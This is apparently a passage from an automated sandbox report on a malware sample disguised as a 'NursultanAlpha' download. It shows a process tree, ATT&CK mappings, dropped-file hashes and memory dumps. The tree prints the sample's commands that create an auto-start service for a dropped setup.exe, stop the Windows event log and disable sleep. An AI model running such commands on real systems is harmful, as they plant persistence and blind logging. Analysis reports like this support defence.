    3⤵
    - Power Settings
    PID:4912
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "MDLEHABT"
    3⤵
    - Launches sc.exe
    PID:4904
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "MDLEHABT" binpath= "C:\ProgramData\windows\setup.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2940
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3944
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "MDLEHABT"
    3⤵
    - Launches sc.exe
    PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Error "
  2⤵
  PID:3772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4328 -ip 4328
1⤵
PID:2584

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\NursultanAlpha\start.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:4952

C:\ProgramData\windows\setup.exe
C:\ProgramData\windows\setup.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4904
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1012
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2024
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5012
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3244
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3016
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:2640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
15878083c031ce4d992139e9fb768095

SHA1
4ac7f6feb837276e6cc0d0083a2bb7abaaf18706

SHA256
b616f3a6a1833f5de6ede0fcbf0aba2964db1d64e05f230e3cee462d7eb2a717

SHA512
e44873bb05618876756092df1ceb3f2dc5e2bd39356531c6f688397097c81a8f9bc7682f313f083580c181c42f046031ef2522d3058a079dca33181f52ff4679

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
e81583fe848842ca80317652ee2b8fa0

SHA1
4b94c4b9d9a22b6dda9df8426c872554c413d471

SHA256
42f998a4f47f9d86a92ce9c2610d3cf5f581f03a880a790210b8c50f8ede1252

SHA512
26ad732127f84552b64e900aeeb9b0d573d6b8b50a8fa40c75d1cb51dcd3dd16e720b7342928aff653348021b89c39746141b58d327f26a10ffa9e628b41105e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
7a49dc889cad61ec91b6a40d43166c31

SHA1
01675c900fb3b32dd7083811f312598b618639c9

SHA256
d01a62af851b7581d8ed09d974fbf2892d15404433837d260627edeb7a7e40f7

SHA512
4ca851bd004e8266cab07907b0e8509cf875f11845551c0600871f203095eea6e7ca06c73697b1daedc5e8e474bcce684ce8787694f0bc395aa36542bb624faa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
3a8039078d7c6143a759dbdaac304719

SHA1
892912dbbee0652c4baa3c65cb07c92b16e2a061

SHA256
06d485d7bcb649956a58bff49c7767b927f1fcac3568bf4d2d5f22e1aecbd14e

SHA512
12ac0f123e7c2bb4458bfa3118d4989000552d0e29e253e502f90f5af89dbe9ba27830829934f7ba5f143785a2c87c59bf1f1b67e8c6553ea3404da81070f210

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1016B

MD5
5205b9238a3a323f3bad866f3ccd1b6a

SHA1
a559dd2a15414557bb886e3cdcbd60f04ea0ccc4

SHA256
18818f771a260db8bb541da772c5a66a11a7317d6627b109c516d8e91c0aeecd

SHA512
dbf46dc78851010c2a33efb2d845840306beae47513e4ba4be54d66b7615ac8ab5486c63767494af51ff1bf0b69d791db852b3b17d2b06d2f15d780bc671176f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
9af68d589bb0b34eea3a437cfdfe7c8d

SHA1
872926070305ecaf9d97551c879c7e42f02834de

SHA256
1415f3523ebdd60bc12570712dd03ebf8ddfdd602229d495ef2bd0acf9c7e617

SHA512
886211eda6a722cdc6685153efe86f15c60a9e7dee5046cb8795324d1295aaac024168b1f40fb25500825e3f67c27caffa0f99fc7da400916cb596c18ce24961

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9ad1c67885e349cebc7329f492f64831

SHA1
42aced605cd2001ed5a9bde9b8b3b6073996b5d4

SHA256
0100dbc78c575b8b0084917ac48d6bd7d9bef6607cd4f03241284f83e03f39cc

SHA512
dd8cbcee8509f5671168520b94ae0e130f7d2225e8ca678f5910c38888c0a7753db3d16d5d48d398de88aeca4b5bd713a1b6d119be08cb741ebecfb777943918

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
44d5e4663fa745bc9ec1b3bedec29bb2

SHA1
d275d24b8573cdb637a3e014e33334bcd42fa4b2

SHA256
c475c4b90da30b6da6735d327eccf3ea7e16fbd4f584b4433cf5b1afbb8f6a58

SHA512
de2579c825fb8c8463110a29db1ae5397279f34ab1cbebea6e59bea069020e8139e940aee88199419e6d83a822b7b29a97a26713a58f1120b44043f1f6df5fce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
13a282cb7b9fcc4f3417d010905c84b6

SHA1
62ba3b0c6ae21a824267c72fa0a1854043d6d3bb

SHA256
c71e9b7220049fbb5b3c86c308c83cef33335299fda068664e4dc86a473fe434

SHA512
ea948682ec7b609363b9925f2a1d63f480ddab97f0df4bd6ecb05449c7662374e99209f6df8c406f5761f0911a4b15cf039adbc3cdf0faa347ff882600fae7ec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3a5fece20a8408e6b9ecf2679a263893

SHA1
5da940ab2247632e07edc17f73f9e4bf5af80d28

SHA256
f097b97b31ae5c19ceab7dfbd1b041ce28791d2ceda49f63b6338f2a29d52f81

SHA512
4f5512ae2637a5d2051f006849128fe8c404637c3b368e5d90a37975cf377028b0dd70059a372cfa239dd63b4a578cca3530eabf883ef2fa43a643c421c07b20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
a9a8732616b0f1199eb94a5b84e52c8a

SHA1
76a229a1decb47e05d756dbf79ada8ebb55dec79

SHA256
4c4aea6a412875560f5e6f9d2655545e49f177eb22ca6f89f32d1bccc14a1c7a

SHA512
77e3121e65344b00cdda0a0fa6cca441aaa37c43df98e67a299ad9a4ac853eea12d68d0ae808bd5c925c970273d7a60d5b403d22532f1a0353cdc1671014a959

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
a3405d1d6ccbb51788a82c544a0362f7

SHA1
8b9a23ee6b6ba4042ac2f5f962677bbe49f455e8

SHA256
dceb54f48ef4247468fb0c168f890e56235a6030608999e2006df9234a63b7a4

SHA512
d3a35b6116b2296546e43287cc113a65bf77ce88cf6af64a8ed161cf701457debd212bff32406d25dc6dee1a9fd9c219a984ade5c9cd27d74e3ffd328c148220

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
ca4f90e80db307f98bcdb6374dbc36af

SHA1
07cbda3f1e008f1a4ad9378820215f2cda7d4dd6

SHA256
765841151c826ec15f910bf58c065886a199a9b5b7d79c2193fd06474c30d160

SHA512
be228abfe67734787625d715de83d978868a4a315df01f00652bccaae70141a8694973341d5a49dfe5e0dc2e716d40d421e030aae24533ecb38fc2485ee9851c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
481df0909afc16da21f092060685d2fd

SHA1
842b912d5d74150f45cf5526fdbd8e60a42b86e9

SHA256
31e50ef79e5a5daba7fa39b2e41a3f51c4a2ed7d5663f73b9f98496a905379c3

SHA512
73c93e21ef9ddb59b960673424f4c9877eaa1eb50711c562c4d91b790adcb40fb922fdc3f3662d9b6e501fcf85c82f1254f552f9b1b10ee2bb05e4969339f61c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
f423a5fed8e45eb2cf6f18ef09d10ac2

SHA1
37bf43727676d5400c7174ee6dde9e32b29a2440

SHA256
912bc05ac0490608658b7fb67291191b5858992022f050a0f05a8d50d3b8633d

SHA512
263a16e6172bf5f249a4e179645c6ecf218212f0b4261d9fc88184534518385da4b138eea5ecb4d3813e976cca74f65ef7b438fd6bea4bcde776045d0011f8eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
92KB

MD5
60ed8a897c079404ef727950c351e815

SHA1
245ea8967312a46385808443e0ac13ba3781a830

SHA256
761b095a2833b1940ef3b9eea0e2c61d3a608e04085fef98ffafd12d93b1790c

SHA512
1fd698a3c00e969f6152005276a95ca5a5bc383858f14a809d9f62ccdf55ca04175a403ac08fcbfbd0de1bbf014cbbb4bec8aeabb74f09461c5f6b5823c8dcfd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
92KB

MD5
5b41f498674bd3ed3316f95b04386465

SHA1
3f42669c5a93cd64b0cd5c0e3f0869be04182669

SHA256
38a993588094e5701700cbdf810d484b85529274ebb8f95f3e50df3209190746

SHA512
7890db53b15a978a3bd6e20aa480cb4887d59acde268bbcbf3b0916c0868e39385df45e0d62650c4d6795bbc348b6f769ff53c230cd7bc34aa286acaced06947

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3b8ef11aff69e43d47f234d5ee0a72b3

SHA1
3869fe51c123c88c1be43b11044b580097466f26

SHA256
0025a82d5c9ef9b1786333fb007e72601dfbf9340d75230f8a3e687e6a107889

SHA512
b46facc11d98c50dacbbd9f36d4715402356d95eed1c073615fcd680bfb142b39830311915fba16a7d8ec0e71640c5d4e9f78930916b8f6432a0f0c203f6fc2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rar23345Ftmp\drivers.exe

Filesize
324KB

MD5
6fac458157b0dd99aaba6c6870d33287

SHA1
c9aee3df202feda130591c683670968c82380564

SHA256
a03a10f765748b4b71f67122eab06fc0aa0b4b57ff57f47a6391bbee7e6aee58

SHA512
421a4f021bdf49949c6d81203cbda7d7a8f7f5d71edd04479401d376dc631d12fdb7fb847fbc21e64dd74a1c1d964662e0396662eb4ced0dd8d10a813bc58447

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rar23345Ftmp\installer.exe

Filesize
2.5MB

MD5
133e03462cbb547a59485251a3b5af02

SHA1
19b30f40b56853f242fca3d739be16bf313da81d

SHA256
24a11447f764f0e6f0c700efa10e5071a4d474a628eaf6c97982a65bf5082141

SHA512
3d94442a16fdef3e6e5a728876f59e208d6b7d9cbeddd8e4e95ebf4976b26787b9c1472298e9c3f7cf5ce4b67fb8365eb73e09a931e82e93d059bdd13b216a46

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n4k2wkpr.ncf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\support.rar

Filesize
2.3MB

MD5
915e515b2072579462a1b7e8fc44d271

SHA1
a3c6353d6eabf245942fad77a0c4c1b2ebb105af

SHA256
7ae0e3d25ed8026602907b249b9a724a7a39baeda3962d97e8516fe56efd8d0a

SHA512
e5b314f97accbbc3924a019e3cd1d30712b662cdb25e0f2b5c4249d3297e857f5ffdb3bdd3d7414b6d02dd65b73de149a04ee9c9dac150f07075f66ac95d0f18

Download Submit
C:\Users\Admin\Desktop\NursultanAlpha\tmp

Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
\??\pipe\crashpad_972_AWQIAIAUPNTTYGLO

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2640-240-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-235-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-252-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-251-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-247-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-243-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-237-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-242-0x0000016921710000-0x0000016921730000-memory.dmp

Filesize
128KB

Download
memory/2640-241-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-246-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-239-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-245-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-238-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-236-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2640-244-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2852-171-0x0000024070130000-0x0000024070152000-memory.dmp

Filesize
136KB

Download
memory/3016-234-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3016-227-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3016-228-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3016-229-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3016-230-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3016-231-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4328-214-0x0000000004C20000-0x0000000004C86000-memory.dmp

Filesize
408KB

Download
memory/4328-213-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download